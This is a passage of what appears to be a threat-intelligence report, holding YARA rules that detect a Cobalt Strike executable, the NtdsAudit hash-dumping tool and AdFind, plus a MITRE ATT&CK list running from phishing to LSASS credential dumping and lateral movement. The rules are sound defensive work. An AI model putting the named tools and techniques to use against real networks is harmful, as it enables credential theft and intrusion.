      $s20 = "g8s9j0t4o,t+n3t1g0k9k1t,o5s0n+t9n6j+o0q2i4j6r1i3f,g+j2h1f2r1n-e9m,i2i7f3q4m-n7n4m.r.e1s*j,m5p/n0n6s8p9g/o7l3t+g.m.q.l7g6t,e-o/q." ascii 
   condition: 
      uint16(0) == 0x5a4d and filesize < 2000KB and 
      8 of them 
} 

import "pe" 

rule cobalt_strike_exe21 { 
   meta: 
      description = "files -  21.exe" 
      author = "TheDFIRReport" 
      date = "2021-07-25" 
      hash1 = "972e38f7fa4c3c59634155debb6fb32eebda3c0e8e73f4cb264463708d378c39" 
   strings: 
      $s1 = "%c%c%c%c%c%c%c%c%cMSSE-%d-server" fullword ascii 
      $s2 = "  VirtualQuery failed for %d bytes at address %p" fullword ascii 
      $s3 = "1brrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrr" ascii 
      $s4 = "\\hzA\\Vza\\|z%\\2z/\\3z\"\\/z%\\/z8\\9z\"\\(zl\\3z\"\\9z4\\5z8\\|z.\\9z+\\5z\"\\qz)\\2z(\\|z:\\=z>\\5z-\\>z \\9z?\\QzF\\\\zL\\" fullword ascii 
      $s5 = "\\zL\\/z>\\qz.\\=za\\0z-\\(z\"\\\\zL\\/z>\\qz?\\,za\\?z5\\.z \\\\zL\\/z>\\qz?\\,za\\0z-\\(z\"\\\\zL\\/z:\\qz*\\5zL\\\\zL\\/z:\\q" ascii 
      $s6 = "\\zL:\\zL" fullword ascii 
      $s7 = "\\\\z:\\\\z" fullword ascii 
      $s8 = "\\qz/\\3z!\\,z%\\0z)\\8zl\\tzc\\?z \\.ze\\|z*\\)z\"\\?z8\\5z#\\2zl\\:z>\\3z!\\|z-\\|z\"\\=z8\\5z:\\9zl\\?z#\\2z?\\(z>\\)z/\\(z#" ascii 
      $s9 = "qz<\\%zL\\\\zL\\9z?\\qz?\\*zL\\\\zL\\9z?\\qz9\\%zL\\\\zL\\9z?\\qz:\\9zL\\\\zL\\9z8\\qz)\\9zL\\\\zL\\9z9\\qz)\\/zL\\\\zL\\:z-\\qz" ascii 
      $s10 = "zL\\\\zL\\0z:\\qz" fullword ascii 
      $s11 = "z-\\(z\"\\\\zL\\/z:\\qz" fullword ascii 
      $s12 = "  VirtualProtect failed with code 0x%x" fullword ascii 
      $s13 = "3\\)z'\\\\zL\\>z)\\\\zL\\/z \\\\zL\\9z8\\\\zL\\0z:\\\\zL\\0z8\\\\zL\\:z-\\\\zL\\*z%\\\\zL\\4z5\\\\zL\\=z6\\\\zL\\9z9\\\\zL\\1z'" ascii 
      $s14 = "z#\\\\zL\\,z \\\\zL\\,z8\\\\zL\\.z#\\\\zL\\.z9\\\\zL\\4z>\\\\zL\\/z'\\\\zL\\/z=\\\\zL\\/z:\\\\zL\\(z$\\\\zL\\(z>\\\\zL\\)z>\\\\z" ascii 
      $s15 = "qz \\5zL\\\\zL\\8z)\\qz \\)zL\\\\zL\\8z%\\*za\\1z:\\\\zL\\9z \\qz+\\.zL\\\\zL\\9z\"\\qz-\\)zL\\\\zL\\9z\"\\qz.\\&zL\\\\zL\\9z\"" ascii 
      $s16 = "qz<\\7zL\\\\zL\\)z6\\qz9\\&za\\?z5\\.z \\\\zL\\)z6\\qz9\\&za\\0z-\\(z\"\\\\zL\\*z%\\qz:\\2zL\\\\zL\\$z$\\qz6\\=zL\\\\zL\\&z$\\qz" ascii 
      $s17 = "qz'\\.zL\\\\zL\\7z5\\qz'\\;zL\\\\zL\\0z8\\qz \\(zL\\\\zL\\0z:\\qz \\*zL\\\\zL\\1z%\\qz\"\\&zL\\\\zL\\1z'\\qz!\\7zL\\\\zL\\1z \\q" ascii 
      $s18 = "]zL\\=z*\\qz6\\=zL\\\\zL\\=z>\\qz-\\9zL\\\\zL\\=z>\\qz.\\4zL\\\\zL\\=z>\\qz(\\&zL\\\\zL\\=z>\\qz)\\;zL\\\\zL\\=z>\\qz%\\-zL\\\\z" ascii 
      $s19 = "  Unknown pseudo relocation protocol version %d." fullword ascii 
      $s20 = "\\L*L\\]qN\\WHKl]qO\\W{j\\XJL\\][G\\}" fullword ascii 
   condition: 
      uint16(0) == 0x5a4d and filesize < 800KB and (pe.imphash()=="17b461a082950fc6332228572138b80c" or  
8 of them) 
} 

rule informational_NtdsAudit_AD_Audit_Tool { 
   meta: 
      description = "files - NtdsAudit.exe" 
      author = "TheDFIRReport" 
      date = "2021-07-25" 
      hash1 = "fb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b" 
   strings: 
      $x1 = "WARNING: Use of the --pwdump option will result in decryption of password hashes using the System Key." fullword wide 
      $s2 = "costura.nlog.dll.compressed" fullword wide 
      $s3 = "costura.microsoft.extensions.commandlineutils.dll.compressed" fullword wide 
      $s4 = "Password hashes have only been dumped for the \"{0}\" domain." fullword wide 
      $s5 = "The NTDS file contains user accounts with passwords stored using reversible encryption. Use the --dump-reversible option to outp" wide 
      $s6 = "costura.system.valuetuple.dll.compressed" fullword wide 
      $s7 = "TargetRNtdsAudit.NTCrypto.#DecryptDataUsingAes(System.Byte[],System.Byte[],System.Byte[])T" fullword ascii 
      $s8 = "c:\\Code\\NtdsAudit\\src\\NtdsAudit\\obj\\Release\\NtdsAudit.pdb" fullword ascii 
      $s9 = "NtdsAudit.exe" fullword wide 
      $s10 = "costura.esent.interop.dll.compressed" fullword wide 
      $s11 = "costura.costura.dll.compressed" fullword wide 
      $s12 = "costura.registry.dll.compressed" fullword wide 
      $s13 = "costura.nfluent.dll.compressed" fullword wide 
      $s14 = "dumphashes" fullword ascii 
      $s15 = "The path to output hashes in pwdump format." fullword wide 
      $s16 = "Microsoft.Extensions.CommandLineUtils" fullword ascii 
      $s17 = "If you require password hashes for other domains, please obtain the NTDS and SYSTEM files for each domain." fullword wide 
      $s18 = "microsoft.extensions.commandlineutils" fullword wide 
      $s19 = "-p | --pwdump <file>" fullword wide 
      $s20 = "get_ClearTextPassword" fullword ascii 
   condition: 
      uint16(0) == 0x5a4d and filesize < 2000KB and 
      1 of ($x*) and 4 of them 
} 

rule informational_AdFind_AD_Recon_and_Admin_Tool {
   meta: 
      description = "files - AdFind.exe" 
      author = "TheDFIRReport" 
      date = "2021-07-25" 
      hash1 = "b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682" 
   strings: 
      $s1 = "   -sc dumpugcinfo         Dump info for users/computers that have used UGC" fullword ascii 
      $s2 = "   -sc computers_pwdnotreqd Dump computers set with password not required." fullword ascii 
      $s3 = "   -sc computers_inactive  Dump computers that are disabled or password last set" fullword ascii 
      $s4 = "   -sc computers_active    Dump computers that are enabled and password last" fullword ascii 
      $s5 = "   -sc ridpool             Dump Decoded Rid Pool Info" fullword ascii 
      $s6 = "      Get top 10 quota users in decoded format" fullword ascii 
      $s7 = "   -po           Print options. This switch will dump to the command line" fullword ascii 
      $s8 = "ERROR: Couldn't properly encode password - " fullword ascii 
      $s9 = "   -sc users_accexpired    Dump accounts that are expired (NOT password expiration)." fullword ascii 
      $s10 = "   -sc users_disabled      Dump disabled users." fullword ascii 
      $s11 = "   -sc users_pwdnotreqd    Dump users set with password not required." fullword ascii 
      $s12 = "   -sc users_noexpire      Dump non-expiring users." fullword ascii 
      $s13 = "    adfind -default -rb ou=MyUsers -objfilefolder c:\\temp\\ad_out" fullword ascii 
      $s14 = "      Dump all Exchange objects and their SMTP proxyaddresses" fullword ascii 
      $s15 = "WLDAP32.DLL" fullword ascii 
      $s16 = "AdFind.exe" fullword ascii 
      $s17 = "                   duration attributes that will be decoded by the -tdc* switches." fullword ascii 
      $s18 = "   -int8time- xx Remove attribute(s) from list to be decoded as int8. Semicolon delimited." fullword ascii 
      $s19 = "replTopologyStayOfExecution" fullword ascii 
      $s20 = "%s: [%s] Error 0x%0x (%d) - %s" fullword ascii 
   condition: 
      uint16(0) == 0x5a4d and filesize < 4000KB and 
      8 of them 
}

MITRE

  • Phishing – T1566
  • Spearphishing Attachment – T1566.001
  • Domain Accounts – T1078.002
  • Command and Scripting Interpreter – T1059
  • User Execution – T1204
  • PowerShell – T1059.001
  • Windows Command Shell – T1059.003
  • Malicious File – T1204.002
  • Create Account – T1136
  • Valid Accounts – T1078
  • Local Account – T1087.001
  • Process Injection – T1055
  • Process Hollowing – T1055.012
  • Signed Binary Proxy Execution – T1218
  • Rundll32 – T1218.011
  • OS Credential Dumping – T1003
  • LSASS Memory – T1003.001
  • Cached Domain Credentials – T1003.005
  • Domain Trust Discovery – T1482
  • Account Discovery – T1087
  • File and Directory Discovery – T1083
  • Process Discovery – T1057
  • Network Share Discovery – T1135
  • Remote System Discovery – T1018
  • Software Discovery – T1518
  • System Owner/User Discovery – T1033
  • System Time Discovery – T1124
  • Lateral Tool Transfer – T1570
  • Remote Services – T1021
  • Remote Desktop Protocol – T1021.001
  • SMB/Windows Admin Shares – T1021.002
  • Windows Remote Management – T1021.006
  • Data from Local System – T1005
  • Data from Network Shared Drive – T1039
  • Data Staged – T1074
  • Local Data Staging – T1074.001
  • Remote Data Staging – T1074.002

Internal case #5426